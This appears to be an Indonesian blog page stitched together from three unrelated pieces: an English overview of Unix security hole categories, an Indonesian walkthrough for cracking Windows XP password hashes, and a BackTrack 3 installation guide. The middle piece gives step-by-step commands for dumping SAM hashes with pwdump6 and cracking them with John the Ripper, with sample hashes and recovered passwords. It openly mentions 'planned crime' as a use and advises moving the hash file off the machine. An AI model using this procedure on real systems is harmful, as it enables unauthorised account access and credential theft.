4 Cara Mengetahui Security Holes (vulnereable)

1) Physical Security Holes.

- Where the potential problem is caused by giving unauthorised persons physical access to the machine, where this might allow them to perform things that they shouldn't be able to do.

A good example of this would be a public workstation room where it would be trivial for a user to reboot a machine into single-user mode and muck around with the workstation filestore, if precautions are not taken.

Another example of this is the need to restrict access to confidential backup tapes, which may (otherwise) be read by any user with access to the tapes and a tape drive, whether they are meant to have permission or not.


2) Software Security Holes

- Where the problem is caused by badly written items of "privledged" software (daemons, cronjobs) which can be compromised into doing things which they shouldn't oughta.

The most famous example of this is the "sendmail debug" hole (see bibliography) which would enable a cracker to bootstrap a "root" shell. This could be used to delete your filestore, create a new account, copy your password file, anything.

(Contrary to popular opinion, crack attacks via sendmail were not just restricted to the infamous "Internet Worm" - any cracker could do this by using "telnet" to port 25 on the target machine. The story behind a similar hole (this time in the EMACS "move-mail" software) is described
in [Stoll].)

New holes like this appear all the time, and your best hopes are to:

a) try to structure your system so that as little software as possible runs with root/daemon/bin privileges, and that which does is known to be robust.

b) subscribe to a mailing list which can get details of problems and/or fixes out to you as quickly as possible, and then ACT when you receive information.


3) Incompatible Usage Security Holes

- Where, through lack of experience, or no fault of his/her own, the System Manager assembles a combination of hardware and software which when used as a system is seriously flawed from a security point of view. It is the incompatibility of trying to do two unconnected but useful
things which creates the security hole.

Problems like this are a pain to find once a system is set up and running, so it is better to build your system with them in mind. It's never too late to have a rethink, though. Some examples are detailed below; let's not go into them here, it would
only spoil the surprise.

4) Choosing a suitable security philosophy and maintaining it

Teknik CRACKING HASH FILE Windows XP SP2

Teknik ini dapat digunakan dalam beragam kebutuhan seperti: lupa password account Administrator Windows XP, untuk iseng-iseng, dan bahkan pada sebuah kejahatan terencana.

Teknik hacking ini SEDERHANA, namun MEMATIKAN!

Download tools berikut:
pwdump6
John The Ripper

INTI TEKNIK ini adalah:
Mengambil HASH file (password yang dienkripsi) menggunakan pwdump6, lalu crack HASH File tersebut dengan John The Ripper. Completed!!

1. Jalankan command prompt (Run -> cmd)

2. Jalankan pwdump6, seperti berikut (misalnya: PwDump6 berada di folder D:\PwDump6) --->> Anda harus bisa mengguanakan command dasar Windows (contohnya: "cd" "dir" "netstat" dan lain-lain)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Pada tahap ini anda sudah berhasil mendapatkan file pass.txt berisi daftar user dan password yang masih dienkripsi.
Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Proses selanjutnya adalah menge-crack file pass.txt dengan menggunakan program John The Ripper.
Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja.
-----------------------------------
Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”.
Bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”.
----------------------------------
Langkah cracking dimulai dengan meng-copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run).
Lalu, jalankan perintah berikut:

D:\john171w\john1701\run>john-mmx.exe pass.txt

Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Upppss! Password sudah terlihat secara kasat mata.
Hasil kerja John The Ripper adalah sebagai berikut: Password untuk user “Administrator” adalah “adminkeren123?, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Install Otomatis BackTrack3 Final Release dengan Installer

Simpel sekali cara menginstall Backtrack 3 Final pada komputer atau laptop anda karena kita akan menggunakan BackTrack Installer.

Langkah PERTAMA:
Pastikan bahwa anda sudah membuat partisi root (/) untuk BackTrack dengan filesystem ReiserFS.

Jika komputer anda hanya memiliki satu sistem operasi (WINDOWS dalam hal ini), maka gunakan Partition Magic. Jika belum ada program ini, install terlebih dahulu. Buatlah 2 partisi dengan spesifikasi sebagai berikut ini:

1. Partisi pertama: Dengan size 5 GB (bebas saja asalkan tidak kurang dari 3.5 GB), berikan label /BACKTRACK3, pilih filesystem ext3
2. Partisi kedua: Dengan size 2 kali jumlah physical memory komputer anda (Jika anda punya RAM 512 MB, maka sizenya adalah 1 GB. Jika RAM anda 2 GB, maka size nya 2 GB), berikan label /SWAP, pilih filesystem SWAP.

Lalu RESTART KOMPUTER ANDA dan mulai mem-booting CD LIVE BACKTRACK 3 Final!

Catatan saja:
Jika komputer anda belum memiliki operasi sistem, maka itu akan sangat lebih mudah lagi. Yang anda butuhkan adalah tools, seperti HIREN dan lain-lain. Maksud saya adalah anda harus membuat partisi dahulu sebelum mulai menginstall BackTrack 3 Final ini. Namun, anda tidak butuh HIREN atau apapun itu jika anda sudah berkemampuan menggunakan commands dalam konsole/terminal linux. Melalui CD Live BackTrack 3 Final, anda dapat buat sendiri partisi yang diperlukan. Jangan lupa RESTART KOMPUTER ANDA dan mulai mem-booting CD LIVE BACKTRACK 3 Final!

Atau, jika komputer anda sudah terinstall satu atau lebih Distro LINUX, maka gunakan tools partition editor dalam linux anda untuk mengkreasikan partisi /BACKTRACK3. Dalam hal ini, anda tidak perlu repot lagi membuat partisi SWAP karena multiple booting Linux dapat menggunakan SATU partisi SWAP saja. Jika partisi sudah di buat, jangan lupa RESTART KOMPUTER ANDA dan mulai mem-booting CD LIVE BACKTRACK 3 Final!


Langkah KEDUA
Penjelasan: Setelah anda booting CD LIVE BACKTRACK 3 Final, anda sudah masuk dalam BackTRack 3 system. Buka konsole/terminal dalam BackTrack 3.

Kita akan memeriksa partisi-partisi apa saja yang ter-mount dalam BackTrack saat ini. Gunakan command ini:

# mount

Anda akan memperoleh informasi tentang semua partisi harddisk yang ter-mount dalam BackTrack! Termasuk partisi baru yang sudah anda buat. Ini INFORMASI PENTING untuk langkah selanjutnya!

Penjelasan: Langkah selanjutnya, gunakan perintah (command) mkreiserfs dalam rangka memformat partisi baru (ingat pada 2 partisi yang telah dibuat dalam Windows, atau partisi yang sudah anda buat dalam Linux).
Partisi baru kita itu harus diformat sebagai ReiserFS File System. Jika anda menggunakan Ext2 File System, maka sistem operasi BackTrack 3 Final ini akan melakukan check sistem setiap kali startup!

Contohnya:
/dev/sda* was not cleanly unmounted, check forced.
/dev/sda*: |======= \ 60.0%

Dalam tutor ini, saya mengasumsikan bahwa BT3 Final akan diinstall pada /dev/sda*. Silahkan anda ganti tanda * menjadi angka yang menunjukkan partisi /BACKTRACK3 yang sudah dibuat itu. Silakan ganti juga sda menjadi hda jika harddisk anda demikian. Lihat kembali hasil dari perintah mount tadi.

Gunakan command berikut ini:

# mkreiserfs /dev/sda* ------> GANTI TANDA * menjadi angka yang menunjukkan partisi root untuk BT3 (/BACKTRACK3) dan gantikan sda menjadi hda jika partisi anda demikian


Langkah KETIGA
Penjelasan: Kita harus membuat sebuah folder. Fungsi folder ini adalah sebagai tempat untuk me-mount partisi baru itu --->> /dev/sda* atau (/BACKTRACK3)

Gunakan commands berikut ini:

# umount /dev/sda* ----->> Ingat, GANTIKAN tanda * menjadi angka yang menunjukkan partisi /BACKTRACK3 anda dan gantikan sda menjadi hda jika partisi anda demikian

# cd /

# mkdir mnt/backtrack

# mount /dev/sda* /mnt/backtrack


Langkah KEEMPAT
Penjelasan: Instalasi otomatis akan dieksekusi. Kita akan menggunakan Installer yang tersedia di dalam BackTrack 3 Beta karena BT3 Final tidak mengikutsertakan installer-nya.

DOWNLOAD BackTrack INSTALLER di sini,

Lalu, klik 2 kali installer itu dan akan segera muncul jendela installer untuk mulai install secara otomatis.

INGAT INI BAIK-BAIK:
- Install BackTrack ke : /mnt/bactrack
- Select Installation method : Real
- Do not restore Original MBR after lilo


Langkah KELIMA
Penjelasan: Tekan Close jika installation process sudah lengkap! Saatnya anda reboot komputer. Tekan log out dan ketikkan reboot agar komputer anda booting kembali. Anda sudah tidak butuh CD LIVE BT3 Final lagi.


Langkah KEENAM
Penjelasan: Anda sudah berada dalam sistem operasi BackTrack 3 Final yang terinstall pada harddisk! Saatnya untuk mengkonfigurasikan lilo.conf agar komputer dapat mem-booting OS lain selain BT3 Final.

Gunakan command berikut ini:

# cd /
# nano /etc/lilo.conf

Tampilan yang muncul adalah:

boot = /dev/sda
prompt
timeout = 1200
change-rules
reset
vga = 773
image = /boot/vmlinuz
root = current
label = BackTrack
read-only

###############################################
#Windows Boot possibility :
other = /dev/sda1
label = Windows
table = /dev/sda
##############################################

INGAT!! Gantikan sda menjadi hda jika partisi anda memang demikian.

Masukkan kode di atas ke dalam file lilo.conf anda menjadi sebagai berikut:

boot = /dev/sda
prompt
timeout = 1200
change-rules
reset
vga = 773
image = /boot/vmlinuz
root = current
label = BackTrack
read-only

#Windows Boot possibility :
other = /dev/sda1
label = Windows
table = /dev/sda

Tekan Ctrl + O -------->> Untuk save file lilo dalam konsole/terminal
Lalu, tekan Ctrl + X ------->>> Untuk keluar dari file lilo.conf yang sudah dimodifikasi itu.

Lalu eksekusi command berikut ini:

# lilo -v


Langkah KETUJUH
Selesai..